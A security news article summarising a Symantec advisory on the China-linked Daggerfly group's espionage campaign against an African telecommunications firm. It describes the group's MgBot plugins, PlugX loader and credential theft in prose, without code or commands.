The APT group known as Daggerfly (as well as Evasive Panda and Bronze Highland) has been observed targeting a telecommunications organization in Africa with new plugins created with the MgBot malware framework.
A new advisory published today by Symantec described the findings, saying the malicious campaign was first spotted in November 2022 and is likely to still be ongoing.
“The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software,” reads the advisory.
“Use of the MgBot modular malware framework and PlugX loader have been associated in the past with China-linked APTs.”
Read more on the PlugX malware: Black Basta Deploys PlugX Malware in USB Devices With New Technique
Symantec said the team first noticed the attack via AnyDesk connections found on a Microsoft Exchange mail server.
“The legitimate, free Rising antivirus software was also used to side-load the PlugX loader onto victim machines,” the team wrote.
Further, Symantec explained the Daggerfly APT used the living-off-the-land tools BITSAdmin and PowerShell to download and install AnyDesk on the victim machine, alongside the GetCredManCreds, a malware tool designed to extract stored credentials from the Windows Credential Manager.
“They also dumped the SAM (Security Account Manager), System and Security hives of the Windows registry using the reg.exe tool. This allowed the adversaries to extract credentials from the SAM database,” Symantec wrote.
To ensure persistence, Daggerfly threat actors then created a local account.
The plugins developed and deployed by the threat actors using the MgBot framework had several information-gathering capabilities, Symantec found.
These included a network scanner, a Chrome and Firefox infostealer, a logging module, a QQ keylogger and messages infostealer, an Active Directory enumeration tool, a password dumper, a screen and clipboard grabber, an Outlook and Foxmail credentials stealer, an audio capture tool, and a process watchdog script.
“All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines,” Symantec explained. “The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering.”
Another threat actor specializing in information gathering is YoroTrooper, a group recently discovered by Cisco Talos.